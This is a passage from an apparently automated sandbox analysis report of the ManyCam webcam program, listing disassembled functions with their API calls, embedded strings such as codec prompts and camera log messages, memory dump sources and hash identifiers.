DrawTextW.USER32(00000000,?,00000000), ref: 0041EE04
SelectObject.GDI32(00000000,?), ref: 0041EE1C

Strings

Verdana, xrefs: 0041EC42
Please confirm that ManyCam has permission to add this codec to your computer., xrefs: 0041ECF5
To run ManyCam's dynamic background effects it is necessary to have the Indeo(R) codec installed and registered on your computer., xrefs: 0041ECCD
For more information please visit , xrefs: 0041ED1F

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: memset$ColorObjectText$DrawIconRectSelect$BrushClientCreateDeleteFillFontIndirectLoadModewcslen
String ID: For more information please visit $Please confirm that ManyCam has permission to add this codec to your computer.$To run ManyCam's dynamic background effects it is necessary to have the Indeo(R) codec installed and registered on your computer.$Verdana
API String ID: 744489110-1759026381
Opcode ID: 58b7292fdbef0849fd6a32aea5d5f1962e852a66df7108f83bd5b60b6f2a3ebe
Instruction ID: 8647ecc2d404d113b85be19741f6e1cb79f34e612718a269b33a6944d2f87c5b
Opcode Fuzzy Hash: 58b7292fdbef0849fd6a32aea5d5f1962e852a66df7108f83bd5b60b6f2a3ebe
Instruction Fuzzy Hash: 00C147B0D00219DBDB14CF94DC94BEEBBB9BF54304F1081AAE509AB381DB746A89CF54

Function 00402130 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 433COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000FB,cvCylDrawCylinder,Invalid parameter.,.\src\cylaux.cpp,0000009A), ref: 00402670

Part of subcall function 00405340: cvSet.CXCORE099(?,?,?,?,00000000,0040217B), ref: 0040535D

cvGEMM.CXCORE099(?,?), ref: 004021A7
_CIcos.MSVCR80 ref: 004021DD
_CIsin.MSVCR80 ref: 004021EA
cvGEMM.CXCORE099(?,?), ref: 0040225F
cvGEMM.CXCORE099(?,?), ref: 004022C4
cvGEMM.CXCORE099(?,?), ref: 00402325
_CIsqrt.MSVCR80 ref: 004023DC
_CIsqrt.MSVCR80 ref: 004023F7
_CIacos.MSVCR80 ref: 00402431
cvSet2D.CXCORE099(?,?,?), ref: 00402488
_CIcos.MSVCR80 ref: 004024E9
_CIsin.MSVCR80 ref: 00402517
cvGEMM.CXCORE099(?,?), ref: 00402559
cvGEMM.CXCORE099(?,?), ref: 004025DA
cvLine.CXCORE099(?,?,?,?,?), ref: 0040264C

Strings

cvCylDrawCylinder, xrefs: 00402669
Invalid parameter., xrefs: 00402664
.\src\cylaux.cpp, xrefs: 0040265F

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: IcosIsinIsqrt$ErrorIacosLineSet2
String ID: .\src\cylaux.cpp$Invalid parameter.$cvCylDrawCylinder
API String ID: 3689646513-1738803442
Opcode ID: 8deb28bca9f0b0be666a0c88b69cf3ae356be30c15ac8f98f76c123cc54bb843
Instruction ID: ee0604925432baceefbd38c3e5584ac40f80a2529fa49fd9d4d055b72c52293a
Opcode Fuzzy Hash: 8deb28bca9f0b0be666a0c88b69cf3ae356be30c15ac8f98f76c123cc54bb843
Instruction Fuzzy Hash: C8F1A171A05601DBD304AF60D989696BFF0FF84780F614D88E5D4672A9EB3198B4CFC6

Function 0041EFD0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 268windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

GetSysColorBrush.USER32(0000000F), ref: 0041F03F
FillRect.USER32(00000000,000000FF,00000000), ref: 0041F053
LoadIconW.USER32(00000000,00000087), ref: 0041F0A1
DrawIconEx.USER32(00000000,0000000A,0000000A,00529873,0000000A,0000000A,00000000,00000000,00000003), ref: 0041F0D3
DeleteObject.GDI32(00529873), ref: 0041F0DD
SetBkMode.GDI32(00000000,00000001), ref: 0041F110
GetTextColor.GDI32(00000000), ref: 0041F11F
SetTextColor.GDI32(00000000,00000000), ref: 0041F130
memset.MSVCR80 ref: 0041F1DA

Part of subcall function 00417240: CreateFontIndirectW.GDI32(00409661), ref: 0041724B

SelectObject.GDI32(00000000,00000000), ref: 0041F21A
memset.MSVCR80 ref: 0041F293
memset.MSVCR80 ref: 0041F2BA
wcslen.MSVCR80 ref: 0041F35E
DrawTextW.USER32(00000000,?,00000000), ref: 0041F385
SelectObject.GDI32(00000000,?), ref: 0041F39D

Strings

Verdana, xrefs: 0041F1A0
visit the ManyCam website help page , xrefs: 0041F2A0
this codec doesn, xrefs: 0041F27B
This feature requires a special video codec to function properly. Unfortunately, xrefs: 0041F22B

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: ColorObjectTextmemset$DrawIconRectSelect$BrushClientCreateDeleteFillFontIndirectLoadModewcslen
String ID: This feature requires a special video codec to function properly. Unfortunately$Verdana$this codec doesn$visit the ManyCam website help page
API String ID: 923866622-1098169901
Opcode ID: 3f31620da8421e62cd21c6cfa0caa7031ff0a88d6dc715023633d5f283328bfa
Instruction ID: 6f95be4a3cc1c25362b5af6b12462e5a34df96a0e09e544e1f1783aa57f49324
Opcode Fuzzy Hash: 3f31620da8421e62cd21c6cfa0caa7031ff0a88d6dc715023633d5f283328bfa
Instruction Fuzzy Hash: 83D1F7B0D002189FDB14DF99DC54BDEBBB8BF58304F1081AAE509AB391DB746A89CF54

Function 004C8720 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C878C
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C879B
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C87D2
Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 004C87E1

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CManyCamModel::UpdateGraphTopologyOnSourceChange, xrefs: 004C8755

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Concurrency::cancellation_token_source::~cancellation_token_source$clock$AllocatorDebugHeap
String ID: CManyCamModel::UpdateGraphTopologyOnSourceChange
API String ID: 952932671-1321120180
Opcode ID: 0b90ff5f2a21a3f5109c721d4de8bebc9373ba52e13293d6d0797d08fd4d5099
Instruction ID: 10940e179f8bca40d99c735d3df1e6ff842ee16e2e5db1de052c77a05b9f2183
Opcode Fuzzy Hash: 0b90ff5f2a21a3f5109c721d4de8bebc9373ba52e13293d6d0797d08fd4d5099
Instruction Fuzzy Hash: 5BE13E70D04248DECB04EFA5D961BEEBBB0AF15308F10815FF4166B282EF785A45DB99

Function 004B2A80 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 004B76D0: fwprintf.MSVCR80 ref: 004B7764
Part of subcall function 004B76D0: fflush.MSVCR80 ref: 004B7774

StringFromGUID2.OLE32()K,?,00000040,)K,0056F910,)K,00574DDC), ref: 004B2C30

Strings

Mediatype info:, xrefs: 004B2A99
Subtype = MEDIASUBTYPE_RGB24, xrefs: 004B2B64
Major type = %s, xrefs: 004B2B11
Major type = MEDIATYPE_Video, xrefs: 004B2AE3
)K, xrefs: 004B2AB0, 004B2AD6, 004B2B00, 004B2B28, 004B2B54, 004B2B7D, 004B2BAA, 004B2BD5, 004B2BFC, 004B2C29, 004B2C54, 004B2C64, 004B2C6D, 004B2C76, 004B2AB3, 004B2AD9, 004B2B03, 004B2B2E, 004B2B5A, 004B2B83, 004B2BB0, 004B2BDB, 004B2C02, 004B2C2F, 004B2C5A
Subtype = MEDIASUBTYPE_RGB32, xrefs: 004B2B8D
Bit count = %d, xrefs: 004B2C8D
Format type = GUID_NULL, xrefs: 004B2BE5
Format type = %s, xrefs: 004B2C3D
Major type = GUID_NULL, xrefs: 004B2ABD
Subtype = %s, xrefs: 004B2BBE
Subtype = GUID_NULL, xrefs: 004B2B38
Format type = FORMAT_VideoInfo, xrefs: 004B2C0C
vids, xrefs: 004B2AD1
Frame size = %dx%d, xrefs: 004B2CB3

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: FromStringfflushfwprintf
String ID: Bit count = %d$Format type = %s$Format type = FORMAT_VideoInfo$Format type = GUID_NULL$Frame size = %dx%d$Major type = %s$Major type = GUID_NULL$Major type = MEDIATYPE_Video$Mediatype info:$Subtype = %s$Subtype = GUID_NULL$Subtype = MEDIASUBTYPE_RGB24$Subtype = MEDIASUBTYPE_RGB32$vids$)K
API String ID: 2684700382-3987823964
Opcode ID: e2d8f3dbb539b25badfc673ac368b6ee49d21c1c39eb2143ec57eff8d32f1992
Instruction ID: 0a30e523ff0296b33be7bff9fb0a9039800934aade4f4bd872009a2dad4e24fd
Opcode Fuzzy Hash: e2d8f3dbb539b25badfc673ac368b6ee49d21c1c39eb2143ec57eff8d32f1992
Instruction Fuzzy Hash: A951C870E5420867DB10AF19DC57EDE3B34BF44705F00841AB908A6283EFB4EA59D7BA

Function 00B96090 Relevance: 30.2, APIs: 20, Instructions: 218COMMON

Download Yara Rule

APIs

Part of subcall function 00B94A80: GetWindowLongA.USER32(?,000000EB), ref: 00B94A83

DefWindowProcA.USER32(?,?,?,?), ref: 00B960B6

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$LongProc
String ID:
API String ID: 2275667008-0
Opcode ID: 44f14b74e0578ae6fe68c301a41bae6ff7f960ce3d9901b2b80d022c868bad66
Instruction ID: db2e0c6da9f3953046750d2bfd243113ad3efe1afa1f74bc6c692cb5e801f837
Opcode Fuzzy Hash: 44f14b74e0578ae6fe68c301a41bae6ff7f960ce3d9901b2b80d022c868bad66
Instruction Fuzzy Hash: 29716CB5204201AFD714DB64DD84E6BFBE8FB88714F004A1DF98593250DB75ED05CBA1

Function 00402C80 Relevance: 30.2, APIs: 20, Instructions: 174COMMON

Download Yara Rule

APIs

Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,0040120F), ref: 00403198
Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,80000010,00000001,?,00000000,?,0040120F), ref: 004031AF
Part of subcall function 00403140: cvCreateImage.CXCORE099(?,?,80000010,00000001,?,?,?,?,?,00000000,?,0040120F), ref: 004031C7

cvCreateMat.CXCORE099(00000004,00000004,00000005,0040120F), ref: 00402C98
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,0040120F), ref: 00402CB4
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,0040120F), ref: 00402CD0
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,0040120F), ref: 00402CEC
cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,?,?,?,0040120F), ref: 00402D08
cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402D24
cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402D40
cvCreateMat.CXCORE099(00000003,00000004,00000005), ref: 00402D5C
cvCreateMat.CXCORE099(00000003,00000004,00000005), ref: 00402D78
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402D94
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DB0
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DCC
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402DE8
cvCreateMat.CXCORE099(00000003,00000001,00000005), ref: 00402E04
cvCreateMat.CXCORE099(00000006,00000006,00000005), ref: 00402E20
cvCreateMat.CXCORE099(00000006,00000001,00000005), ref: 00402E38
cvCreateMat.CXCORE099(00000006,00000001,00000005), ref: 00402E50
cvCreateMat.CXCORE099(00000004,00000004,00000005), ref: 00402E68
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402E80
cvCreateMat.CXCORE099(00000004,00000001,00000005), ref: 00402E98

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Create$Image
String ID:
API String ID: 1237808576-0
Opcode ID: ae6bf935b923b4879af12b20d1e7ba834aac778abf3f025c7bd5bd2a014dc142
Instruction ID: 61334a59a6328505146fa154266dd27d5a2e39e93b606410563eabcbac9550f4
Opcode Fuzzy Hash: ae6bf935b923b4879af12b20d1e7ba834aac778abf3f025c7bd5bd2a014dc142
Instruction Fuzzy Hash: 225106B0A81B027AF67057719E0BB9326912B26B01F050539BB4DB83C6FBF59521CA99

Function 004B8960 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 397COMMON

Download Yara Rule

Strings

Such camera is already in the list: %s, xrefs: 004B8AC7
Creating the graph for camera %s, xrefs: 004B8C3E
CManyCamGraphMgr::AddCameraInput, xrefs: 004B8995
Destroy the graph for camera %s, xrefs: 004B8B94
Graph creation failed with hr=%X, xrefs: 004B8E3F
Moniker is NULL., xrefs: 004B89FF
Failed to create the graph with hr=%X, xrefs: 004B8C85
Desired frame size is invalid., xrefs: 004B8A49
Creating new entry for camera %s, xrefs: 004B8D86
Error: camera name is empty., xrefs: 004B89BB

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorDebugHeapfflushfwprintf
String ID: CManyCamGraphMgr::AddCameraInput$Creating new entry for camera %s$Creating the graph for camera %s$Desired frame size is invalid.$Destroy the graph for camera %s$Error: camera name is empty.$Failed to create the graph with hr=%X$Graph creation failed with hr=%X$Moniker is NULL.$Such camera is already in the list: %s
API String ID: 2739697835-1067953073
Opcode ID: 8320536623643fb9a82ccd93883c4b51503a044c0bfe6443a3796fe1dcf3ba29
Instruction ID: 0c2db78db8441f90a5655b608386306daf3177cd87543fca05d57ae7838a8fe2
Opcode Fuzzy Hash: 8320536623643fb9a82ccd93883c4b51503a044c0bfe6443a3796fe1dcf3ba29
Instruction Fuzzy Hash: F5024C70900208EFDB14EF95CC92BEEBBB5BF54304F10415EE5066B2D2DB786A45CBA9

Function 00402EC0 Relevance: 30.1, APIs: 20, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012A4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032CA
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012A8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032DC
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012AC,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032EA
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C0,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403302
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403314
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403326

cvReleaseMat.CXCORE099(00000118,?), ref: 00402ED9
cvReleaseMat.CXCORE099(00000114), ref: 00402EEB
cvReleaseMat.CXCORE099(0000011C), ref: 00402EFD
cvReleaseMat.CXCORE099(00000120), ref: 00402F0F
cvReleaseMat.CXCORE099(00000124), ref: 00402F21
cvReleaseMat.CXCORE099(00000128), ref: 00402F33
cvReleaseMat.CXCORE099(0000012C), ref: 00402F45
cvReleaseMat.CXCORE099(00000130), ref: 00402F57
cvReleaseMat.CXCORE099(00000134), ref: 00402F69
cvReleaseMat.CXCORE099(00000100), ref: 00402F77
cvReleaseMat.CXCORE099(00000104), ref: 00402F89
cvReleaseMat.CXCORE099(00000110), ref: 00402F9B
cvReleaseMat.CXCORE099(00000108), ref: 00402FAD
cvReleaseMat.CXCORE099(0000010C), ref: 00402FBF
cvReleaseMat.CXCORE099(00000138), ref: 00402FD1
cvReleaseMat.CXCORE099(0000013C), ref: 00402FE3
cvReleaseMat.CXCORE099(00000140), ref: 00402FF5
cvReleaseMat.CXCORE099(00000144), ref: 00403007
cvReleaseMat.CXCORE099(00000148), ref: 00403019
cvReleaseMat.CXCORE099(0000014C), ref: 0040302C

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Release$Image
String ID:
API String ID: 1442443227-0
Opcode ID: 18739cc84c4e819f13137b706e7aec6c30c3c301381e9e13cdbf496b20ef20f3
Instruction ID: e9e9c9bdbcc23bd9ce4fc92c64f6ef92138ef717c9158f18fb2c09d524048864
Opcode Fuzzy Hash: 18739cc84c4e819f13137b706e7aec6c30c3c301381e9e13cdbf496b20ef20f3
Instruction Fuzzy Hash: 3A415AB1C01B11ABDA70DB60D94EB97B6EC7F01300F44493E914B929D0EB79F658CAA3

Function 00B92C30 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157COMMON

Download Yara Rule

APIs

cvGetMat.CXCORE099(?,?,00000000,00000000), ref: 00B92C6F
cvGetErrStatus.CXCORE099 ref: 00B92C79
cvError.CXCORE099(000000FF,cvSaveImage,Inner function failed.,.\loadsave.cpp,000001C4), ref: 00B92C98
cvError.CXCORE099(000000F1,cvSaveImage,00BDD488,.\loadsave.cpp,000001CB), ref: 00B92CEB
cvError.CXCORE099(000000FE,cvSaveImage,could not save the image,.\loadsave.cpp,000001D9), ref: 00B92D1C
cvFlip.CXCORE099(?,?,00000000), ref: 00B92D44
cvGetErrStatus.CXCORE099(?,?,?,?,?,?,?,?,?,?,?,?,?,00B92287,?,?), ref: 00B92D4E
cvFlip.CXCORE099(00000000,00000000,00000000), ref: 00B92D6D
cvGetErrStatus.CXCORE099(?,?,?), ref: 00B92D75
cvError.CXCORE099(000000E5,cvSaveImage,null filename,.\loadsave.cpp,000001C2), ref: 00B92DEA
cvGetErrStatus.CXCORE099 ref: 00B92DF2

Strings

null filename, xrefs: 00B92DDE
could not save the image, xrefs: 00B92DCA
could not find a filter for the specified extension, xrefs: 00B92D10
Inner function failed., xrefs: 00B92C8C, 00B92D88
.\loadsave.cpp, xrefs: 00B92C87, 00B92CDA, 00B92D0B, 00B92D83, 00B92DC5, 00B92DD9
cvSaveImage, xrefs: 00B92C91, 00B92CE4, 00B92D15, 00B92D8D, 00B92DE3

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus$Flip
String ID: .\loadsave.cpp$Inner function failed.$could not find a filter for the specified extension$could not save the image$cvSaveImage$null filename
API String ID: 2640733558-2883540358
Opcode ID: 4c5e0771d07e20323fbdc083f66435f272a4439b9e604bd6e80e63cd0c9c9bed
Instruction ID: bb5bd88270fc64c14f95fc2dc916111891dfa52a60ddc3ed75485787b08364a1
Opcode Fuzzy Hash: 4c5e0771d07e20323fbdc083f66435f272a4439b9e604bd6e80e63cd0c9c9bed
Instruction Fuzzy Hash: 6B415571E803107BDE24AB188C52F6EB7D9DF98B50F1441FAFC55673D2E2B1E84486A2

Function 004A8E90 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

_DebugHeapAllocator.LIBCPMTD ref: 004A8F0A

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

wcscmp.MSVCR80 ref: 004A8F3A
wcscmp.MSVCR80 ref: 004A8F53
wcscmp.MSVCR80 ref: 004A8F80
_DebugHeapAllocator.LIBCPMTD ref: 004A92EC
_DebugHeapAllocator.LIBCPMTD ref: 004A9304
_DebugHeapAllocator.LIBCPMTD ref: 004A9324

Strings

InternalProperties, xrefs: 004A8F7B

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$wcscmp$FileFindFirst
String ID: InternalProperties
API String ID: 1222566788-1350816593
Opcode ID: c6da74deea4d9cd51fd66fbdb8e43503fd6c04aced2bb07cda00fcb46decaaae
Instruction ID: d461dac8b76a5e630202117bde1037354cd356562fc5738dbdf76f67a61ac83d
Opcode Fuzzy Hash: c6da74deea4d9cd51fd66fbdb8e43503fd6c04aced2bb07cda00fcb46decaaae
Instruction Fuzzy Hash: 30F13AB49001199FDB14DF54CC94BAEB7B5BF55304F1085DAEA0AA7381DB34AE88CF68

Function 00B92A40 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

cvCreateMat.CXCORE099(?,?,?), ref: 00B92AD3
cvGetErrStatus.CXCORE099 ref: 00B92ADF
cvCreateImage.CXCORE099(?,?,00000008,?), ref: 00B92AF4
